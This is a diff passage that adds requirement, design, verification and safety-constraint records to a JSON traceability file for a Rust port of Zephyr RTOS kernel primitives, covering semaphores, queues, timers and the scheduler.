+      "title": "Zephyr: Semaphore acquisition with count greater than zero",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "If wait queue non-empty: unpend first thread with OK → WokeThread. Else if count < limit: count += 1 → Incremented. Else: no-op → Saturated. C source: kernel/sem.c lines 95-121.\n",
+      "id": "SWDD-SEM-GIVE",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "give"
+      ],
+      "title": "Semaphore::give — z_impl_k_sem_give port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Unit tests in plain/src/timeout.rs covering add expiry computation, abort active/inactive, remaining calculation, expires retrieval, announce firing, tick monotonicity, list ordering after insertion, and tick arithmetic bounds.\n",
+      "id": "UV-TO-001",
+      "links": [
+        {
+          "target": "SWDD-TO-ADD",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TO-ABORT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TO-ANNOUNCE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Timeout unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Making a thread ready adds it to the run queue and triggers a cache update to check if preemption is needed. Maps to sched.c:348-375.\n",
+      "id": "SWREQ-SC-SC06",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "ready",
+        "asil-d"
+      ],
+      "title": "SC6: ready_thread adds thread to run queue and updates cache",
+      "type": "sw-req"
+    },
+    {
+      "description": "Validates limit > 0 and initial_count <= limit (returns -EINVAL otherwise). Constructs Semaphore with empty WaitQueue. C source: kernel/sem.c lines 45-73.\n",
+      "id": "SWDD-SEM-INIT",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "init"
+      ],
+      "title": "Semaphore::init — z_impl_k_sem_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus annotations present in src/sched.rs with requires/ensures clauses targeting scheduler properties (SC01-SC16). Proof lemmas need fixing (exec-in-proof calls). Not yet passing verification. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SC-001",
+      "links": [
+        {
+          "target": "SWREQ-SC-SC01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC10",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC11",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC12",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC13",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC14",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC15",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC16",
+          "type": "verifies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Scheduler Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Thread lifecycle model with create, setup, priority query, preemptibility classification, and abort cleanup. Tracks thread state validation, priority bounds, and lifecycle state machine. Actual arch context, stack setup, userspace verification, and custom data stay in C — Gale verifies state validation, priority classification, and cleanup correctness only. No unsafe code.\n",
+      "id": "SWARCH-TL-001",
+      "links": [
+        {
+          "target": "SWREQ-TL-TH01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TL-TH02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TL-TH04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-TL-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "lifecycle",
+        "architecture"
+      ],
+      "title": "Thread lifecycle module (gale::thread_lifecycle)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Verus specifications in src/event.rs with requires/ensures clauses that formally verify event properties (EV01-EV08) via SMT solving. Proves bitmask operation correctness, wait condition safety, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-EV-001",
+      "links": [
+        {
+          "target": "SWREQ-EV-EV01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Event Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The kernel hangs, deadlocks, or starves a safety-critical thread, preventing timely execution of vehicle safety functions.\n",
+      "id": "L-3",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "loss"
+      ],
+      "title": "Loss of availability",
+      "type": "loss"
+    },
+    {
+      "description": "Enqueue an item at the tail. Increment count by 1, return OK.\n",
+      "id": "SWDD-QU-APPEND",
+      "links": [
+        {
+          "target": "SWARCH-QU-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-QU-QU02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-QU-QU06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "append"
+      ],
+      "title": "Queue::append — k_queue_append port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Every integer arithmetic operation in the kernel (tick counters, priority values, semaphore counts, stack indices, lock counts) must be performed with Rust checked_add / checked_sub / saturating_* operations or equivalent Verus-proven no-overflow postconditions, eliminating silent wrapping.  Enforced by SWREQ-SC-SC16, SWREQ-SK-SK08, SWREQ-MUT-M10, proven by FV-TO-001, FV-SK-001, FV-MUT-001, FV-SEM-001.\n",
+      "id": "SC-6",
+      "links": [
+        {
+          "target": "H-6",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-SC-SC16",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK08",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M10",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "overflow",
+        "arithmetic"
+      ],
+      "title": "All arithmetic must use overflow-checked operations",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The sum of free and used chunks always equals the total chunk count. This conservation law prevents chunk leaks.\n",
+      "id": "SWREQ-HP-HP02",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "conservation",
+        "asil-d"
+      ],
+      "title": "HP2: free_chunks + used_chunks == total_chunks (conservation)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Every allocation table entry (ATE) stored in flash shall include a CRC protecting the ATE header fields and the associated data payload.  On read, the CRC shall be verified and corrupted entries shall be rejected.  This detects bit-rot, partial writes, and flash cell degradation.\n",
+      "id": "SYSREQ-ZMS-004",
+      "links": [
+        {
+          "target": "STKH-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "integrity",
+        "crc",
+        "zms"
+      ],
+      "title": "Data integrity — CRC on every stored value",
+      "type": "system-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism to define and initialize a semaphore at compile time.\n",
+      "id": "ZEP-SRS-5-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Counting Semaphore Definition At Compile Time",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Constructs a timer with status = 0, period = given value, running = false.\n",
+      "id": "SWDD-TM-INIT",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TM-TM01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TM-TM06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TM-TM07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "init"
+      ],
+      "title": "Timer::init — z_impl_k_timer_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's generic queue, which underlies k_fifo, k_lifo, and k_queue. Contains z_impl_k_queue_init, k_queue_append, k_queue_prepend, z_impl_k_queue_get, z_impl_k_queue_cancel_wait, k_queue_insert, plus peek, remove, unique_append, merge_slist, and userspace wrappers. The Gale port models the item counter only — actual linked-list data management stays in C.\n",
+      "id": "PROV-QU-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "fifo",
+        "lifo",
+        "queue",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/queue.c — generic queue implementation (fifo/lifo/queue)",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The Zephyr RTOS shall support scheduling work items for submission after a specified delay, allowing deferred-deferred execution patterns.\n",
+      "id": "ZEP-SRS-WK-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-WK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "work"
+      ],
+      "title": "Zephyr: Delayed Work Submission",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "k_is_preempt_thread returns non-zero if the current thread is preemptible (non-negative priority and not in ISR context). Maps to thread.c:111-121.\n",
+      "id": "SWREQ-TL-TH04",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "preempt",
+        "asil-d"
+      ],
+      "title": "TH4: is_preempt_thread correctly classifies thread type",
+      "type": "sw-req"
+    },
+    {
+      "description": "If queue is full: return Err(ENOMSG). Otherwise return Ok(write_idx) for the caller to copy data, advance write_idx = (write_idx + 1) % max_msgs, and increment used_msgs.\n",
+      "id": "SWDD-MQ-PUT",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "put"
+      ],
+      "title": "MsgQ::put — z_impl_k_msgq_put index advancement",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If num_used < num_blocks: increment num_used, return OK. Otherwise return ENOMEM.\n",
+      "id": "SWDD-MS-ALLOC",
+      "links": [
+        {
+          "target": "SWARCH-MS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MS-MS04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "alloc"
+      ],
+      "title": "MemSlab::alloc — z_impl_k_mem_slab_alloc port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The Zephyr RTOS shall support two wait modes: K_EVENT_WAIT_ANY (unblock when any requested bit is set) and K_EVENT_WAIT_ALL (unblock only when all requested bits are set).\n",
+      "id": "ZEP-SRS-EV-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-EV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "event"
+      ],
+      "title": "Zephyr: Event ANY/ALL Matching Modes",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Application WASM components using kernel object imports are compiled to ARM Cortex-M native code by Synth.  Host function calls (to Gale kernel primitives) become direct function calls in the ARM binary. The Synth codegen for host calls preserves all safety invariants.\n",
+      "id": "SWREQ-KILN-003",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-002",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWARCH-TGT-002",
+          "type": "verified-on"
+        },
+        {
+          "target": "SWARCH-TGT-003",
+          "type": "verified-on"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "synth",
+        "arm",
+        "codegen"
+      ],
+      "title": "Synth ARM codegen for WASM application components",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full Zephyr kernel queue test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_QUEUE=y. Tests exercise the complete k_queue API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/queue.\n",
+      "id": "SV-QU-001",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Queue Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "A fatal error classification model that matches Zephyr's fatal.c semantics: reason code mapping, recovery decision based on context (thread/ISR) and mode (production/test).\n",
+      "id": "SYSREQ-FT-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-FT",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "kernel"
+      ],
+      "title": "Fatal error classification and recovery model",
+      "type": "system-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall handle tick counter overflow correctly, ensuring that timeout arithmetic remains valid across the full range of the system tick counter.\n",
+      "id": "ZEP-SRS-TO-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TO",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeout"
+      ],
+      "title": "Zephyr: Timeout Overflow Protection",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A poll event subsystem that matches the Zephyr k_poll API semantics: event initialization, readiness checking, signal raising, and state transitions. Must maintain event state consistency and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-PL-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-PL",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "kernel"
+      ],
+      "title": "Poll event state machine",
+      "type": "system-req"
+    },
+    {
+      "description": "The unmodified Zephyr twister test suite is executed against Gale kernel primitives via the system-level verification artifacts SV-SEM-001, SV-MUT-001 (implicit via SV-SC-001), SV-SC-001, SV-TL-001 (thread lifecycle), and the integration-level IV-SEM-001, IV-MUT-001, IV-SC-001.  Passing this suite demonstrates full API-level semantic equivalence with the Zephyr C originals.\n",
+      "id": "Sn-4",
+      "links": [
+        {
+          "target": "G-5",
+          "type": "supports"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "testing",
+        "zephyr",
+        "integration"
+      ],
+      "title": "Zephyr twister integration tests",
+      "type": "safety-solution"
+    },
+    {
+      "description": "Read the current status value and reset status to 0. Returns the value that was read.\n",
+      "id": "SWDD-TM-STATUS-GET",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TM-TM02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "status-get"
+      ],
+      "title": "Timer::status_get — z_impl_k_timer_status_get port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "A dynamic thread pool model that matches Zephyr's dynamic.c semantics: thread stack alloc/free with bounded pool tracking.\n",
+      "id": "SYSREQ-DY-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-DY",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "kernel"
+      ],
+      "title": "Dynamic thread pool stack accounting model",
+      "type": "system-req"
+    },
+    {
+      "description": "Select the highest-priority ready thread from the run queue, falling back to the idle thread if no other threads are ready.\n",
+      "id": "SWDD-SC-NEXT-UP",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SC-SC04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC13",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "scheduling"
+      ],
+      "title": "Scheduler::next_up — next_up port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No arithmetic operation on used or size causes integer overflow. All arithmetic is guarded by min() operations with capacity checks.\n",
+      "id": "SWREQ-PP-PP10",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "PP10: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "The device dependency graph is a DAG. Level ordering prevents cycles since devices at lower levels cannot depend on higher-level devices.\n",
+      "id": "SWREQ-DI-DI03",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "dag",
+        "asil-d"
+      ],
+      "title": "DI3: no circular dependencies (DAG property)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Initialize wait queue, reset spinlock, delegate to sys_heap_init. C source: kernel/kheap.c lines 26-33.\n",
+      "id": "SWDD-KH-INIT",
+      "links": [
+        {
+          "target": "SWARCH-KH-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-KH-KH01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-KH-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "init"
+      ],
+      "title": "KHeap::init — k_heap_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If CANCELING: return EBUSY. If QUEUED: return 0 (idempotent). Else: set QUEUED flag, return 1 (new) or 2 (re-queued while running). C source: kernel/work.c lines 320-365.\n",
+      "id": "SWDD-WK-SUBMIT",
+      "links": [
+        {
+          "target": "SWARCH-WK-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-WK-WK02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-WK-WK03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-WK-WK04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-WK-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "submit"
+      ],
+      "title": "WorkItem::submit — submit_to_queue_locked port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The system shall implement a semaphore synchronization primitive for coordinating access to shared resources among multiple threads.\n",
+      "id": "ZEP-SYRS-14",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Counting Semaphore",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Unit tests in plain/src/event.rs covering init validation, post OR semantics, set replacement, clear AND-complement, set_masked selective update, wait_any/wait_all condition checks, and bitmask preservation.\n",
+      "id": "UV-EV-001",
+      "links": [
+        {
+          "target": "SWDD-EV-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-EV-POST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-EV-SET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-EV-CLEAR",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-EV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Event unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Kani BMC harnesses in tests/kani_equivalence.rs that model C behavior as Rust functions (derived from kernel/*.c source) and prove the Gale implementation produces identical results for all bounded inputs. Covers stack (init/push/pop/sequence), semaphore (init/give/take), mutex (lock/unlock validate), msgq (init/put/get/purge), and pipe (init/write_check/read_check). REQ-TRACTOR-001 Level 2.\n",
+      "id": "FV-TRACTOR-EQ",
+      "links": [
+        {
+          "target": "REQ-TRACTOR-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "kani",
+        "tractor",
+        "equivalence",
+        "swe-6"
+      ],
+      "title": "Kani C↔Rust semantic equivalence (bounded model checking)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all timeslice code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-TS-003",
+      "links": [
+        {
+          "target": "SWREQ-TS-TS01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Timeslice Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unit tests in src/smp_state.rs covering init (valid/invalid), start_cpu (available/full), stop_cpu (multi/single-CPU), resume_cpu, global_lock, global_unlock (held/empty), active/inactive queries, all_active, and is_locked.\n",
+      "id": "UV-SM-001",
+      "links": [
+        {
+          "target": "SWDD-SM-START",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "SmpState unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Zephyr user space (CONFIG_USERSPACE=y) test suite executed on qemu_cortex_m3. Validates syscall dispatch, privilege boundaries, and user-mode access to Gale kernel primitives via system calls. Test suite: zephyr/tests/kernel/userspace.\n",
+      "id": "SV-US-001",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "User Space Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "If allocated < capacity: allocated++, OK. If full: ENOMEM.\n",
+      "id": "SWDD-MP-ALLOC",
+      "links": [
+        {
+          "target": "SWARCH-MP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MP-MP02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MP-MP03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "alloc"
+      ],
+      "title": "MemPool::alloc — pool alloc port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The event value is always a valid u32 bitmask. All bitwise operations preserve the u32 domain with no undefined behavior.\n",
+      "id": "SWREQ-EV-EV07",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "EV7: valid bitmask",
+      "type": "sw-req"
+    },
+    {
+      "description": "Mailbox message validation and matching model. Tracks sender/receiver thread ID validation, message match logic (wildcard and exact), and data exchange size calculation (min of tx/rx sizes). Actual thread blocking and data copy stays in C — Gale verifies protocol safety only. No unsafe code.\n",
+      "id": "SWARCH-MB-001",
+      "links": [
+        {
+          "target": "SWREQ-MB-MB01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MB-MB03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MB-MB04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MB-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "architecture"
+      ],
+      "title": "Mailbox module (gale::mbox)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Primary Zephyr integration test target for Gale kernel primitives. 20 upstream Zephyr test suites (semaphore, mutex, condvar, msgq, stack, pipe, timer, event, sched, thread, and more) run on the qemu_cortex_m3 board under west + QEMU.  All 20/20 suites pass with Gale replacing the corresponding C kernel modules. Chosen for QEMU Cortex-M3 availability in Zephyr CI Docker image without hardware setup — the canonical CI board for Zephyr kernel tests.\n",
+      "id": "SWARCH-TGT-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "test-target",
+        "qemu",
+        "cortex-m3",
+        "integration"
+      ],
+      "title": "Integration test target — QEMU Cortex-M3 (qemu_cortex_m3)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "The system shall implement a timeout subsystem for tracking absolute deadlines and managing time-based blocking operations.\n",
+      "id": "ZEP-SYRS-TO",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeout"
+      ],
+      "title": "Zephyr: Timeout Subsystem",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/poll_integration.rs exercising the full poll API surface across module boundaries. Tests event init and readiness, signal raise/reset/check sequences, state machine transitions, and multi-event polling scenarios.\n",
+      "id": "IV-PL-001",
+      "links": [
+        {
+          "target": "SWARCH-PL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Poll integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's kernel timer.  Contains z_impl_k_timer_init, z_impl_k_timer_start, z_impl_k_timer_stop, z_timer_expiration_handler, z_impl_k_timer_status_get, plus userspace wrappers and sync timer support. The Gale port models the status counter and period mode only.\n",
+      "id": "PROV-TM-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "timer",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/timer.c — timer implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Verus specifications in src/work.rs with requires/ensures clauses that formally verify work item properties (WK1-WK6) via SMT solving. Proves state machine transitions (idle/queued/running/ canceling), submit/cancel correctness, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-WK-001",
+      "links": [
+        {
+          "target": "SWREQ-WK-WK01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-WK-WK02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-WK-WK03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-WK-WK04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-WK-WK05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-WK-WK06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Work Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Resuming a suspended thread adds it back to the run queue and triggers rescheduling. Maps to sched.c:533-548.\n",
+      "id": "SWREQ-SC-SC08",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "resume",
+        "asil-d"
+      ],
